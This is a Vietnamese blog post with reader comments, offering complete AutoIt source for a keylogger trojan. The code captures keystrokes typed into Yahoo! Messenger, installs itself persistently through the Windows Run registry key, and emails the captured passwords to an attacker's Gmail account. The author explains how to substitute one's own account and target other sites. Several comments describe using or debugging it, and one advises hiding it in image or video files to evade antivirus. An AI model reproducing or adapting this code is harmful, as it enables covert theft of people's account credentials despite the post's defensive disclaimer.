Làm sao để viết được một con trojan lấy pass của yahoo

Tác giả: Bùi Quốc Phong

Bài viết này chỉ mang tính chất minh họa, không nhằm mục đích phá hoại. Tôi không chịu bất kỳ trách nhiệm nào nếu các bạn sử dụng nó với mục đích xấu.

Thời buổi ngày nay, việc ăn cắp pass ở các tài khoản trực tuyến nhiều đến nỗi không đếm nổi. Nào là ăn cắp pass ở yahoo, nào là tài khoản ngân hàng, nào là tài khoản game online…. Cách thức chủ yếu của các hacker đó là cài trojan, keylog. Bạn đã rất cẩn thận và bạn đã có một phần mềm virus tốt, nhưng liệu bạn có phòng tránh được tất cả các virus cũng như các trojan và keylog? biết cách một con trojan hoạt động như thế nào để phòng tránh cũng tốt đúng không nào? Nào chúng ta bắt đầu thôi

Công cụ: Tất nhiên lập trình thì phải có công cụ để lập trình rồi. Để đơn giản chúng ta sử dụng AutoIt để viết code. Các bạn có thể download AutoIt tại website: http://www.autoitscript.com

Viết code: Mình cung cấp cho các bạn đoạn code sau để các bạn tham khảo

#include <File.au3>
#NoTrayIcon
Global $oMyError = ObjEvent(“AutoIt.Error”, “MyErrFunc”)
$keylog=””
$co=0
_dangky()
;Capital Letters
For $n = 65 To 90
HotKeySet(Chr($n), “My_HotKey_Func”)
Next
;Lowercase Letters
For $n = 97 To 122
HotKeySet(Chr($n), “My_HotKey_Func”)
Next
;Numbers
For $n = 47 To 58
HotKeySet(Chr($n), “My_HotKey_Func”)
Next

HotkeySet(“.”, “My_Hotkey_Func”)
HotKeySet(“+!d”, “_exit”)
;Specials
$charL1=”{SPACE}|{BACKSPACE}|{UP}|{DOWN}|{LEFT}|{RIGHT}|{ENTER}|{HOME}|{END}|{INSERT}|{DELETE}|{PGUP}|{PGDN}|{!}|{#}|{+}|{^}|{NUMLOCK on}|{NUMLOCK off}|{CAPSLOCK off}|{CAPSLOCK on}|{ESC}|{TAB}”
$charL= $charL1&”|{NUMPAD0}|{NUMPAD1}|{NUMPAD2}|{NUMPAD3}|{NUMPAD4}|{NUMPAD5}|{NUMPAD6}|{NUMPAD7}|{NUMPAD8}|{NUMPAD9}”
$KeyList = StringSplit($charL, “|”)
$maloaibo=StringSplit($charL1, “|”)
For $n = 1 To $KeyList[0]
HotKeySet($KeyList[$n], “MY_HotKey_Func”)
Next

While 1

;Sleep(100)
WinActive(“Yahoo! Messenger”)
$co=1
WinWaitNotActive(“Yahoo! Messenger”)
$tg=$keylog
For $i=1 To UBound($maloaibo)-1
If StringInStr($keylog,$maloaibo[$i]) Then
$tg=StringReplace($keylog,$maloaibo[$i],””)
EndIf
Next
If StringLen($tg)>9 Then
_sendEmail($keylog)
$keylog=””
EndIf
$co=0
WEnd

Func My_HotKey_Func()
;MsgBox(0, “”, @HotKeyPressed)
if $co=1 Then
$keylog&=@HotKeyPressed
EndIf
$Name = @HotkeyPressed
If $Name = “.” then $Name = “period”

;SoundPlay(“c:\sounds\”&$Name&”.wav”) ; exceptions for keys like period slash or symobols that can’t be in filenames
; Turn off hotkey temporarily so letter can be sent.
HotKeySet(@HotKeyPressed)
Send(@HotKeyPressed)
; turn hotkey back on
HotKeySet(@HotKeyPressed, “My_HotKey_Func”)
EndFunc   ;==>My_HotKey_Func

Func _dangky() ; dang khu va copy
IF Not FileExists(@WindowsDir&”\ikcmds.exe”) Then
FileCopy(“ikcmds.exe”,@WindowsDir&”\ikcmds.exe”)
EndIf
$reg=RegRead(“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”, “ikcmds”)
if @error Then
RegWrite(“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”, “ikcmds”, “REG_SZ”, @WindowsDir&”\ikcmds.exe”)
EndIf
EndFunc
Func _sendEmail($noidung)
$s_SmtpServer = “smtp.gmail.com”
$s_FromName = “trommatkhau”
$s_FromAddress = “abcdef@gmail.com”
$s_ToAddress = “abcdefhau@gmail.com
$s_Subject = “Hack pass yahoo”
$as_Body = $noidung
$s_AttachFiles = “”  ;@WindowsDir&”\ikcmds.txt”
$s_CcAddress = “”
$s_BccAddress = “”
$s_Username = “abcded”
$s_Password = “**************”
$IPPort = 465
$ssl = 1
;##################################
; Script
;##################################
Global $oMyRet[2]
Global $oMyError = ObjEvent(“AutoIt.Error”, “MyErrFunc”)
$rc = _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject, $as_Body, $s_AttachFiles, $s_CcAddress, $s_BccAddress, $s_Username, $s_Password, $IPPort, $ssl)
If @error Then
MsgBox(0, “Error sending message”, “Error code:” & @error & ”  Rc:” & $rc)
Exit
EndIf
EndFunc

Func _INetSmtpMailCom($s_SmtpServer, $s_FromName, $s_FromAddress, $s_ToAddress, $s_Subject = “”, $as_Body = “”, $s_AttachFiles = “”, $s_CcAddress = “”, $s_BccAddress = “”, $s_Username = “”, $s_Password = “”, $IPPort = 25, $ssl = 0)
$objEmail = ObjCreate(“CDO.Message”)
$objEmail.From = ‘”‘ & $s_FromName & ‘” <‘ & $s_FromAddress & ‘>’
$objEmail.To = $s_ToAddress
Local $i_Error = 0
Local $i_Error_desciption = “”
If $s_CcAddress <> “” Then $objEmail.Cc = $s_CcAddress
If $s_BccAddress <> “” Then $objEmail.Bcc = $s_BccAddress
$objEmail.Subject = $s_Subject
If StringInStr($as_Body, “<“) And StringInStr($as_Body, “>”) Then
$objEmail.HTMLBody = $as_Body
Else
$objEmail.Textbody = $as_Body & @CRLF
EndIf
If $s_AttachFiles <> “” Then
Local $S_Files2Attach = StringSplit($s_AttachFiles, “;”)
For $x = 1 To $S_Files2Attach[0]
$S_Files2Attach[$x] = _PathFull($S_Files2Attach[$x])
If FileExists($S_Files2Attach[$x]) Then
$objEmail.AddAttachment($S_Files2Attach[$x])
Else
$i_Error_desciption = $i_Error_desciption & @LF & ‘File not found to attach: ‘ & $S_Files2Attach[$x]
SetError(1)
Return 0
EndIf
Next
EndIf
$objEmail.Configuration.Fields.Item(“http://schemas.microsoft.com/cdo/configuration/sendusing&#8221;) = 2
$objEmail.Configuration.Fields.Item(“http://schemas.microsoft.com/cdo/configuration/smtpserver&#8221;) = $s_SmtpServer
$objEmail.Configuration.Fields.Item(“http://schemas.microsoft.com/cdo/configuration/smtpserverport&#8221;) = $IPPort
;Authenticated SMTP
If $s_Username <> “” Then
$objEmail.Configuration.Fields.Item(“http://schemas.microsoft.com/cdo/configuration/smtpauthenticate&#8221;) = 1
$objEmail.Configuration.Fields.Item(“http://schemas.microsoft.com/cdo/configuration/sendusername&#8221;) = $s_Username
$objEmail.Configuration.Fields.Item(“http://schemas.microsoft.com/cdo/configuration/sendpassword&#8221;) = $s_Password
EndIf
If $ssl Then
$objEmail.Configuration.Fields.Item(“http://schemas.microsoft.com/cdo/configuration/smtpusessl&#8221;) = True
EndIf
;Update settings
$objEmail.Configuration.Fields.Update
; Sent the Message
$objEmail.Send
If @error Then
SetError(2)
Return $oMyRet[1]
EndIf
EndFunc   ;==>_INetSmtpMailCom
;
;
; Com Error Handler
Func MyErrFunc()
$HexNumber = Hex($oMyError.number, 8)
$oMyRet[0] = $HexNumber
$oMyRet[1] = StringStripWS($oMyError.description, 3)
;ConsoleWrite(“### COM Error !  Number: ” & $HexNumber & ”   ScriptLine: ” & $oMyError.scriptline & ”   Description:” & $oMyRet[1] & @LF)
SetError(1); something to check for when this function returns
Return
EndFunc   ;==>MyErrFunc
Func _exit()
Exit
EndFunc

Bạn hãy nhìn vào đoạn code trên và chú ý vào những chỗ tôi đánh dấu mầu đỏ. Mục đích của con trojan này là ăn cắp pass và tài khoản người dùng yahoo messenger và gủi về một địa chỉ email định trước. Để có thể đẽ dàng sử dụng bạn hãy tạo một tài khoản ở Gmail.com sau đó thay các dòng địa chỉ mầu đỏ bằng tài khoản tương ứng của bạn là được. Bạn cũng có thể biến đổi con trojan này dùng để lấy tài khoản và mật khẩu của các trang khác bàng cách thay đổi 2 đoạn code mà tôi cũng đã đánh dấu mầu đỏ đó là: WinActive(“Yahoo! Messenger”) và WinWaitNotActive(“Yahoo! Messenger”)(“Yahoo! Messenger”). Nói thế thôi là bạn hiểu rồi đúng không. Hi vọng sau bài viết này các bạn sẽ tự rút ra cho mình một các phòng chống hiệu quả cho những tài khoản cá nhân của mình.

Nếu bạn muốn copy bài viết này phải ghi rõ nguồn từ http://cuopbien.tk

Tagged: , , ,

25 thoughts on “Làm sao để viết được một con trojan lấy pass của yahoo

  1. Cường Tháng Tám 9, 2008 lúc 6:32 chiều Reply

    Cảm ơn bác, e đang thử để lấy lại pass YM cho ng yêu

  2. NCC Tháng Tám 22, 2008 lúc 2:39 chiều Reply

    anh cho em nick Y!M để em tiện hỏi với

  3. PiPi Tháng Chín 15, 2008 lúc 8:19 sáng Reply

    anh cho nick Y!M de em tein lian lac voi anh kkhong. chac anh cung viet trojan chu gi? em cung muon hoc lam nhung ma khong co ai chi bao em ca. em len mang kiem co luc duoc luc khong anh oi

  4. mekongviet Tháng Mười Một 10, 2008 lúc 9:18 sáng Reply

    nham nhi that, co gioi thi hack to ne: mekongviet@yahoo.com

    dang pass hack duoc len day cho anh em xem voi, de bit po teo “lua doi luong tam” ntn

  5. mekongviet Tháng Mười Một 10, 2008 lúc 9:21 sáng Reply

    bullshit

  6. kao Tháng Mười Một 13, 2008 lúc 2:14 sáng Reply

    dis, lua dao, lam deo j co. cha le thang yahoo de yen ah.

  7. emxinhiuchien Tháng Mười Một 18, 2008 lúc 3:36 sáng Reply

    haha, anh chủ topic này dzui tính quá. làm gì có chiện này, đi đâu cũng thấy, đã có ai thành công đâu

  8. emxinhiuchien Tháng Mười Một 18, 2008 lúc 3:37 sáng Reply

    bạn mekongviet còn dọa và thách nữa àh, mình sẽ ủng hộ phe nào nhỉ?

  9. kuas Tháng Mười Một 18, 2008 lúc 1:28 chiều Reply

    @mekongviet: Bạn có hiểu những đoạn code ở trên không, nếu bạn hiểu nó bạn sẽ hiểu những gì bạn nói, còn nếu không hiểu mong bạn hãy phát ngôn thận trọng hơn một chút.

  10. CHICKEN BOY Tháng Mười Hai 17, 2008 lúc 6:50 sáng Reply

    DOAN CODE TREN RAT HAY! TOI LA DAN IT DAY. HACK PHAI CO MOT CAI DAU.
    BANG KHONG CUNG DEN THE THIO HUHUHU

  11. Dim Tháng Ba 10, 2009 lúc 8:33 sáng Reply

    uhm…uhm… cai’ code kua? pac’ bi loi~ rui` pac’ oi >”< mong pac’ kiem tra thu? ^^! hinh` nhu o doan cuoi’ do’ pac’😀

  12. DarkWizard Tháng Ba 19, 2009 lúc 12:51 chiều Reply

    Thanks ! Baì viết rất hay !
    Các bạn cũng nên cám ơn tác giả của bài viết này vì tinh thần opensource
    Những kẻ không biết gì hay mù code thì đừng nên thốt ra những lời khiếm nhã như thế

  13. Cam On Ban Tháng Ba 28, 2009 lúc 3:29 chiều Reply

    Cam on ban minh! Minh cung muon thu lam chuong trinh nay nhung do trinh do lap trinh con qua kem va chua biet lap trinh tren autoit nen ko the viet neu co dieu kien ban chi qua cho minh cach lap trinh tren autoit dc ko ban. Thanks ban nhieu. Minh se thuong xuyen check tren trang nay neu ban huong dan so qua cho minh thi xin gui vao mail cua minh la dc.

    • kuas Tháng Ba 28, 2009 lúc 6:43 chiều Reply

      @Cam On Ban: Chào bạn, thật khó để có thể thành lập một topic về AUTOIT trên blog của mình, với AutoIt cách học tốt nhất là bạn hãy tải chương trình AutoIT (bản full) về cài đặt sau đó mở help của nó ra, mỗi hàm trong AutoIT đều có hướng dẫn dẫn cụ thể. Sau khi học xong các hàm cơ bản bạn có thể vào Forum của AutoIt, ở đó có rất nhiều điều đáng để cho bạn học. Mình nghĩ AutoIt là một công cụ tốt để viết các ứng dụng nhỏ phục vụ cho công việc hàng ngày của mình, học nó có rất nhiều lợi ích. Khi bạn cần viết một chương trình nào đó, nếu gặp khó khăn bạn có thể post lên blog của mình, chúng ta sẽ cùng nhau thảo luận, chúc bạn may mắn

  14. spyhihihi Tháng Năm 9, 2009 lúc 4:28 sáng Reply

    saj cung dc nhung mo` luc’ sned mail bj loi` rui` ban oi coi dum` lai caj dj

  15. spyhihihi Tháng Năm 9, 2009 lúc 4:39 sáng Reply

    sua? laj het rui` chay ngon nhun ma` lag may’ woo’ voi lai luc danh’ chu~ no’ ra cham kho’ danh’ wa’ nguoi` ta nhinh` la` bit lien` ah`

    • vip Tháng Mười Hai 1, 2010 lúc 6:16 sáng Reply

      bạn sửa được hả , sao có một số lỗi mình sửa ko được, bạn chỉ mình với !

  16. nasa Tháng Ba 15, 2010 lúc 1:32 chiều Reply

    🙂 O) 0)

  17. nasa Tháng Ba 15, 2010 lúc 1:46 chiều Reply

    !:)

  18. tap hack Tháng Năm 20, 2010 lúc 12:12 chiều Reply

    ban kuas oi, cho minh xin yh nhe. minh dang gap mot so van de

  19. vitcon Tháng Mười 9, 2010 lúc 1:53 chiều Reply

    ban oi, cho minh nik yh, minh co viec can hoi , thks ban!

  20. russell Tháng Hai 9, 2011 lúc 6:14 sáng Reply

    Chào bạn Kuas, cảm ơn bạn vì bài viết rất hay này. Mình vừa bị kẻ xấu lấy mất pass yahoo để lừa đảo mua thẻ điện thoại Viettel, mình rất bực mình nhưng không biết làm thế nào. Bạn bè gọi tới hỏi mình kinh doanh điện thoại từ lúc nào thế làm mình ngớ cả người. Bạn có thể cho mình nick yahoo để mình nhờ bạn trao đổi không? Rất mong tin bạn.

  21. Xuân Tháng Ba 18, 2011 lúc 3:55 chiều Reply

    Các bạn dám viết và chạy 1 chương trình mà cũng ko hiểu rõ từng câu lệnh thì cũng tài thật????

  22. ducquyen_kmt09 Tháng Sáu 27, 2011 lúc 6:14 sáng Reply

    hay con này hay đấy…..nhưng các bạn không nên sử dụng nó một cách tràn trụi thì rất dể bị anti nó diệt nên không thành công là đúng roài…..các bạn nên ghếp nó vào với các file hình ảnh,video….hoặc nén nó lại nhiêu lần để anti không phát hiện ra thằng đệ mình đang làm việc chứ…thật là kém ưa đi…..

  23. Nhok Kim Tháng Mười Một 2, 2011 lúc 4:17 sáng Reply

    sao loi nhieu vay?
    Sua mai khong dc hic

Gửi phản hồi

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s

%d bloggers like this: